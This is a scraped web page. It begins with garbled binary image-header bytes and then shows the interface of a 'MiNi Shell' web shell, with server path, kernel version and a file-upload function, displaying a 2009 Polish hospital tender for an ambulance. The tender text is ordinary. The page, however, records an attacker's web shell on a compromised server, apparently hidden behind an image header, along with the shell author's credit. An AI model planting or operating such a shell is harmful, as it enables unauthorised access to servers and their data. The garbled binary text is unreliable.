JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090513/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090513/146698-N-2009.html

<p class="kh_header"><b>Wieluń: Zakup nowoczesnego  ambulansu medycznego wraz z wyposażeniem dla potrzeb Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Wieluniu.</b><br>
<b>Numer ogłoszenia: 146698 - 2009; data zamieszczenia: 13.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Wieluniu , ul. Szpitalna 16, 98-300 Wieluń, woj. łódzkie, tel. +48 043 8438311 w. 355, faks 043 843 83 11 wew. 213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.powiat.wielun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup nowoczesnego  ambulansu medycznego wraz z wyposażeniem dla potrzeb Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Wieluniu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> AMBULANS  SANITARNY  KARETKA 
WYMAGANIA TECHNICZNE ŚRODKA TRANSPORTU
Ambulans sanitarny  typ C,  spełniający cechy techniczne i jakościowe określone w Polskich Normach przenoszących europejskie normy zharmonizowane zgodnie z przepisami ustawy o Państwowym Ratownictwie Medycznym :
-	warunki określone w Rozporządzeniu  Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów,  zakresu ich niezbędnego wyposażenia (Dz.U. Nr 32 , poz. 262 z 2003 r.) ,
-	wymagania  określone w normie  PN-EN 1789-2002/A1:2004 i PN-EN 1865  w zakresie 
      odpowiednim do niniejszego postępowania,
-     musi posiadać nw. wyposażenie:

Uwaga:
Parametry z wypisanymi przez Zamawiającego wartościami w kolumnie  Wymagane warunki techniczno - użytkowe karetki reanimacyjno - wypadkowej należy traktować jako graniczne.
Oferty, które nie spełniają tych wymagań zostaną odrzucone jako niezgodne ze Specyfikacją Istotnych Warunków Zamówienia.


Lp.	Wymagane warunki techniczno - użytkowe karetki reanimacyjno - wypadkowej
I.	NADWOZIE
1.	Typu  furgon, zamknięty , częściowo przeszklony z możliwością ewakuacji pacjenta i personelu 
 - o wymiarach  wnętrza przystosowanych do  potrzeb personelu  medycznego,    
   parametry przedziału medycznego :
    - wysokość min.185 cm, 
    - długość min. 320 cm
    - szerokość min. 170 cm
2.Przystosowany do przewozu 5 osób (z kierowcą)  w pozycji siedzącej plus 1 osoba w  pozycji leżącej na noszach
3.Drzwi tyłu nadwozia wysokie, przeszklone, dwuskrzydłowe, obejmujące całą  ścianę 
tylną, otwierające się pod kątem 270 o - wyposażone dodatkowo w ograniczniki 
oraz blokady położenia skrzydeł, drzwi wyposażone w światła awaryjne,  
włączające  się automatycznie przy otwieraniu
 4.Drzwi boczne prawe i lewe przesuwane do tyłu z  otwieraną szybą, wejście ze stopniem zewnętrznym, wysuwanym   mechanicznie  lub automatycznie przy otwieraniu drzwi 
5.Stopień tylny stanowiący zderzak ochronny
6.Wizualny sygnał ostrzegający kierowcę w czasie jazdy o fakcie niecałkowitego 
domknięcia  drzwi
7.Lakierowanie w kolorze białym 
8.Centralny zamek wszystkich drzwi
9.Autoalarm
10.Szyby okien w kabinie sanitarnej zmatowione w 2/3 wysokości 
11.Poduszka powietrzna dla kierowcy i pasażera
12.Koło zapasowe zamontowane w sposób nie powodujący zmniejszenia prześwitu 
pomiędzy  podwoziem a podłożem
13.ściana działowa oddzielająca przedział medyczny od kabiny kierowcy,
z zamykanym przejściem 
II.SILNIK
1.Wysokoprężny z turbodoładowaniem , pojemność skokowa 2100 -3000 cm3 
 Spełniający wymogi normy spalin  EURO  4  lub EURO 5 .
2.O mocy powyżej min.130 KM, moment  obrotowy  min. 300 Nm
3.Wskaźnik mocy do całkowitej masy dopuszczalnej min. 34 ( moc KM do całkowitej masy dopuszczalnej w tonach)
III.ZESPÓŁ   NAPĘDOWY
1.Skrzynia biegów  manualna synchronizowana lub automatyczna :
 min. 6 biegów do przodu i bieg wsteczny
2.Napęd na koła przednie, lub tylne, lub napęd 4 x 4
IV.UKŁAD  HAMULCOWY
1.Z systemem wspomagania nagłego hamowania  typu BAS
2.Z układem zapobiegającym blokowaniu kół  podczas hamowania ABS
3.Hamulce tarczowe obu osi
V.UKŁAD  KIEROWNICZY
Ze wspomaganiem
VI.ZAWIESZENIE
Oś przednia: stabilizator (opisać  dokładnie)
VII.OGRZEWANIE  I  WENTYLACJA
1.Ogrzewanie cieczą chłodzącą silnik, dotyczy również przedziału medycznego
2.Ogrzewanie postojowe - grzejnik elektryczny z  sieci 230V z możliwością ustawienia  temperatury i termostatem o mocy min. 2,0 kW
3.Niezależny od silnika system ogrzewania przedziału kierowcy i przedziału med.
umożliwiający niezależne ogrzanie silnika przed rozruchem kabiny kierowcy i przedziału medycznego z możliwością  ustawienia temperatury i termostatem
4. Mechaniczna wentylacja nawiewno-wywiewna; zapewniająca możliwość dwudziestokrotnej  wymiany powietrza na godzinę w czasie postoju pojazdu 
5.Klimatyzacja przedziału sanitarnego i  kabiny kierowcy - dwuparownikowa z niezależną regulacją temperatury i siły nadmuchu dla przedziału medycznego i  kabiny kierowcy
VIIII.NSTALACJA  ELEKTRYCZNA
1.alternator o mocy min.1200 W, zapewniający ładowanie zespołu dwóch akumulatorów
2.Zespół dwóch akumulatorów o odpowiednio  dużej pojemności, każdy z akumulatorów o  pojemności nie mniejszej jak 80 Ah do zasilania wszystkich odbiorników prądu 
3. Zasilanie zewnętrzne 230 V z dwoma gniazdami  wewnętrznymi z zabezpieczeniem uniemożliwiającym uruchomienie silnika  przy podłączonym zasilaniu zewnętrznym i z zabezpieczeniem przeciwporażeniowym
4.Układ zasilania zewnętrznego  o napięciu 230V, 50Hz spełniający następujące wymagania:
 - pokrywający zapotrzebowanie na energię elektryczną wszystkich urządzeń ambulansu,
- uniemożliwiający rozruch silnika przy podłączonym zasilaniu,
-  posiadający zabezpieczenie  przeciwporażeniowe,
-  posiadający automatyczną ładowarkę akumulatorową zapewniającą jednoczesne 
   ładowania dwóch akumulatorów
5.W pomieszczeniu dla pacjenta min. trzy podłączenia 12 V
IX.OZNAKOWANIE  POJAZDU
1.Belka świetlna z lampami wyładowczymi stroboskopowymi w przedniej części   
pojazdu,  z  możliwością nadawania komunikatów głosowych, podświetlony 
napis AMBULANS
2.dwie niebieskie lampy pulsacyjne w technologii LED, na wysokości pasa przedniego 
barwy niebieskiej, dodatkowe dwie takie lampy w błotnikach przednich
3.Lampa niebieska wyładowcza w tylnej części dachu - typu stroboskopowego
4.Światła awaryjne zamontowane na drzwiach  tylnych włączające się po ich otwarciu
5.Dodatkowe migacze zamontowane w górnych, tylnych częściach nadwozia
6.Dodatkowe lampy obrysowe zamontowane w  tylnych górnych częściach nadwozia
7.Pas odblaskowy barwy niebieskiej dookoła  pojazdu na wysokości linii  podziału nadwozia  oraz pas barwy czerwonej dookoła pojazdu - wykonane z folii odblaskowej
8.Napis lustrzany AMBULANS z przodu pojazdu, kolor czerwony odblaskowy
9.Standardowe oznaczenie typu karetki na bokach  ambulansu i drzwiach tylnych R lub W
10.Symbol Państwowego Ratownictwa Medycznego określonego w załączniku do ustawy z dnia 25 lipca 2001 r. o PRM
X.OŚWIETLENIE  SPECJALNE
 Reflektory zewnętrzne z trzech stron pojazdu (tył i boki) ze światłem rozproszonym do oświetlenia miejsca akcji, po 2 szt. z każdej strony, z  możliwością włączania/wyłączania 
zarówno z kabiny kierowcy jak przedziału medycznego
XI.SYGNALIZACJA  DŹWIĘKOWA
1.sygnał dźwiękowy modulowany o mocy min. 100 W, z możliwością podawania 
komunikatów  głosem (zmiana modulacji klaksonem)
2.	Dodatkowe sygnały pneumatyczne przystosowane do pracy ciągłej
XII	ŁĄCZNOŚĆ  RADIOWA
1.	Radiotelefon (Motorola GM 360  lub równoważny) posiadający:
a) deklaracje zgodności CE - załączyć
b) zakres częstotliwości: 136-174 MHz
c) liczbę kanałów min. 250 z możliwością skanowania oraz jednoczesną pracą 
    zsimpleksową  oraz dwusimpleksową,
d) rodzaj modulacji F3E,
e) odstęp między kanałowy 12,5 kHz,
f) odporność na intermodulację 75 dB,
g) selektywność sąsiedniokanałowa 65 dB,
h) zasilanie 12 do 14,5 V (z uziemionym minusem),
i) regulowaną moc nadajnika z ogranicznikiem czasu nadawania wynoszącą od 0,5 do 25 W dla nadajników przenośnych, od 0,5 do 5 W dla nadajników przewoźnych i bazowych,
j) czułość odbiornika 0,3  V,
k) zakres pracy w temperaturach od -30  stopni C do + 60 stopni C,
l) promieniowanie niepożądane nieharmoniczne - 36 dBm,
ł)  możliwość współpracy z siecią telefoniczną  (PSIN) w systemie DTMF,
m)możliwość pracy w systemie przywoławczym
DODATKOWO
  Wyposażenie w system nadzoru obiektów mobilnych w oparciu o monitoring satelitarny.
2.	Antena marki Radmor typ 30834/3 lub równoważna
a) 1/4 fali 
b) zakres częstotliwości 168-170 MHz
c) impedancje wejścia 50 Ohm
d) współczynnik fali stojącej mniejszy jak 1,4
e) polaryzacje pionowa
f) charakterystykę promieniowania dookolną
g) odporność na działanie wiatru 55m/blokadzie
h) pod anteną zamontowana zaślepka, po odkręceniu której będzie istniał dostęp do główki anteny,
i) wyprowadzenie kabla antenowego i zasilania 12 V do radiostacji w kabinie  ambulansu
XIII	WYPOSAŻENIE  POJAZDU
1.	Wszystkie miejsca siedzące w kabinie  kierowcy  wyposażone w bezwładnościowe pasy bezpieczeństwa i zagłówki
2.	Urządzenie do wybijania szyb
3.	Dodatkowa gaśnica w przedziale medycznym
4.	Nóż do przecinania pasów bezpieczeństwa
5.	Komplet opon radialnych letnich wraz z felgami
6.	Światła przeciwmgielne przednie
7.	Szperacz w kabinie kierowcy na elastycznym   przewodzie
8.	Apteczka
XIV.	WYPOSAŻENIE   PRZEDZIAŁU  MEDYCZNEGO
1.	Dwa fotele obrotowe z zagłówkiem, z możliwością złożenia siedziska do oparcia, wyposażone w bezwładnościowe pasy bezpieczeństwa o trzech punktach kotwiczenia oraz zagłówki, regulowany kąt oparcia
2.	Siedzenie wyposażone w pasy bezpieczeństwa montowane na przegrodzie dzielącej kabinę kierowcy od części ambulansu, służącej do przewozu chorych z bezwładnościowym pasem biodrowym i zagłówkiem
3.	Na ścianach bocznych zestawy ergonomicznych zamykanych szafek i półek wykonanych w tworzywa sztucznego, zabezpieczonych przed niekontrolowanym wypadnięciem umieszczonych tam przedmiotów, bez ostrych krawędzi, zapewniający możliwość montażu butli tlenowych, materaca próżniowego i innego sprzętu ( w zabudowie meblowej uwzględniono zamykaną na klucz szafkę na lekarstwa)
4.	Wzmocniona podłoga, wyłożona wykładziną antypoślizgową, łatwo zmywalną połączoną szczelnie z pokryciem boków, zapewniająca odpływ płynów z wnętrza pojazdu  


5.	Na ścianie działowej zespół szafek z miejscem do zamontowania 2 szt. walizek lub toreb  medycznych z możliwością wyjmowania do wnętrza przedziału medycznego z jednoczesnym dostępem z zewnątrz przez drzwi boczne, z blatem roboczym wykończonym blachą nierdzewną
6.	Uchwyt do kroplówki na 3 szt. płynów infuzyjnych mocowany w suficie - uchwyt do kroplówki wytrzymuje obciążenie przynajmniej 5 kg
7.	Zabezpieczenie osób, urządzeń oraz elementów wyposażenia przed przemieszczaniem się w czasie jazdy i zabezpieczeniu przed niekontrolowanemu przesunięciu w wypadku przyłożenia siły równej 10 g w kierunku  przodu, w poprzek oraz w pionie, gwarantujące jednocześnie łatwość dostępu i użycia
8.	Centralna instalacja tlenowa z 2 butlami ( każda min. 1000 l tlenu), 1 butlą przenośną ( min. 400 l tlenu), reduktorami i urządzeniami do mierzenia przepływu oraz dozownik do tlenu, mocowany w ścianie karetki
9.	Trzy gniazda poboru tlenu monoblokowe typu panelowego AGA
10.	Centralna instalacja próżniowa z jednym punktem poboru wyposażonym w regulator siły ssania , manometr podciśnienia słój wielorazowego użytku na wydzielinę, min. 1 l.  kompletem przewodów, wszystkie elementy wraz z obudową manometru autoklawowalne,
podać model, folder, opisać
11.	Izolacja dźwiękowo-termiczna przedziału medycznego
12.	Oświetlenie charakteryzujące się parametrami nie gorszymi jak poniżej:
1) sześć punktów ze światłem rozproszonym,
2) dwa punkty - oświetlenie halogenowe z regulacją kąta umieszczone nad noszami
3) jeden punkt  oświetlenie halogenowe blatu roboczego




13.	Podstawa noszy głównych (laweta) blokowana w min. dwóch pozycjach - centralnej i brzeżnej, z obejściem z trzech stron wokół noszy, z przesuwem bocznym, wysuwem na zewnątrz umożliwiającym łatwe wprowadzenie noszy, możliwością ustawienia do pozycji Trendelenburga - elektrycznie  (pochył 10 stopni), wymagany folder i deklaracja zgodności CE lub certyfikat CE na zgodność z normą EN PN 1789 w zakresie testów zderzeniowych
	
14.	Szyna typu Modura zamocowana na ścianie lewej o długości min. 30 cm
15	Uchwyty mocowania deski ortopedycznej
16.	Defibrylator transportowy
17.	Miejsce mocowania defibrylatora umożliwiające korzystanie z aparatu w czasie jazdy
18.	Respirator transportowy
19.	Uchwyty mocowania respiratora umożliwiające korzystanie z aparatu w czasie jazdy
20.	Uchwyty mocowania dla dwóch butli po 1000 l tlenu każda i jednej butli przenośnej o pojemności zapewniającej 400 l tlenu przy ciśnieniu roboczym 150 atm
21.	- Uchwyty zamocowania materaca  pneumatycznego
- Uchwyty mocowania kosza na śmieci.
22.	Uchwyty mocowania (przechowywania) szyn ortopedycznych, deski ortopedycznej dziecięcej, kamizelki Kendricka.
23.	Uchwyty ścienne i sufitowe dla personelu; w tym jeden uchwyt sufitowy o długości min. 1 m umieszczony w osi podłużnej noszy
24.	Termometr wskazujący temperaturę w przedziale medycznym
25.	Ogrzewacz płynów infuzyjnych o pojemności 3 l ze wskazaniem rzeczywistej temperatury wewnątrz urządzenia oraz  termostatem
26.	W przedziale medycznym powinno być oprócz wyjścia tylnego inne wyjście pozwalające na ewakuację personelu -  oznakowane jako wyjście awaryjne
(opisać jakie) 
27.	Nosze główne wielozadaniowe oraz transporter wielopoziomowy 
A	Nosze główne wielozadaniowe na transporterze wielopoziomowym powinny posiadać następujące parametry:
1) przystosowanie do prowadzenia  reanimacji,
2) z możliwością płynnej regulacji kąta nachylenia oparcia pod plecami do min.  75 stopni
3) z kompletem szybkorozpinalnych pasów zabezpieczających o regulowanej długości   
   mocowanych bezpośrednio do ramy noszy,
4) poręcze boczne,
5) z nie sprężynującym materacem odpornym na środki dezynfekcyjne,
6) ze składanym statywem do kroplówki umożliwiającym zamocowanie dwóch toreb z 
   płynami infuzyjnymi
B	Transporter wielopoziomowy pod nosze  reanimacyjne powinien posiadać  następujące parametry :
1) z systemem szybkiego i bezpiecznego  połączenia z noszami
2) możliwość zapięcia noszy głową lub nogami w kierunku jazdy
3) wielostopniowa min. 6 poziomowa regulacja wysokości
4) możliwość ustawienia pozycji drenażowych (Trendelenburga i Fowlera)
5) z systemem mocowania transportera do podstawy
6) wyposażony w 4 kółka , min. 2 obrotowe   wokół swej osi.
 7) min. dwa kółka wyposażone w hamulce
8) poduszka pod głowę
9) obciążenie dopuszczalne min. 150 kg
10) certyfikat CE lub deklaracja zgodności 
     - załączyć do oferty
11) załączyć folder
XV	GWARANCJA

	- Pojazd bazowy i zabudowa oraz sprzęt    medyczny - minimum 24 miesiące ,
- Serwis w promieniu do 100 km od miasta   Wielunia

XVI	WYMAGANIA DODATKOWE
	- Rok produkcji ambulansu 2009 (podać) , fabrycznie nowy,
- Świadectwo homologacji na pojazd  bazowy (załączyć do  oferty),
- Świadectwo homologacji na ambulans (załączyć do oferty)
- Folder ambulansu i sprzętu medycznego  (załączyć do oferty),
- Przebiegi między przeglądami samochodu, co  min. 20 000 km,
- Fabryczny  radioodtwarzacz CD ,
- Komplet opon letnie wraz z felgami,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.11.41.00-0, 34.11.41.21-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy potwierdzający spełnienie warunków:
1. Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2. Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem 
technicznym i osobami zdolnymi do wykonania zamówienia; lub którzy przedstawią 
pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
3 .Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
 4. Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
 5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o oświadczenia lub dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
3) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych.   
4) Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
5) Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.  
6) Oświadczenie, że oferowane produkty spełniają właściwe dla każdego z nich wymogi jakościowe czego potwierdzeniem są certyfikaty    i atesty Urzędu Rejestracji Produktów Leczniczych , Wyrobów Medycznych i Produktów  Biobójczych, dopuszczające oferowane produkty do obrotu i stosowania w służbie zdrowia na terenie RP (do wglądu na każde żądanie Zamawiającego) .
7) Świadectwo homologacji na pojazd  bazowy 
8) Świadectwo homologacji na ambulans 
9) Folder ambulansu i sprzętu medycznego.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.powiat.wielun.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek Wykonawcy Specyfikację istotnych warunków zamówienia można uzyskać w  Dziale OiZP pokój 204 - nieodpłatnie..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2009 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej
w Wieluniu, ulica Szpitalna 16 , 98 - 300 Wieluń - SEKRETARIAT POKÓJ  nr  216..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com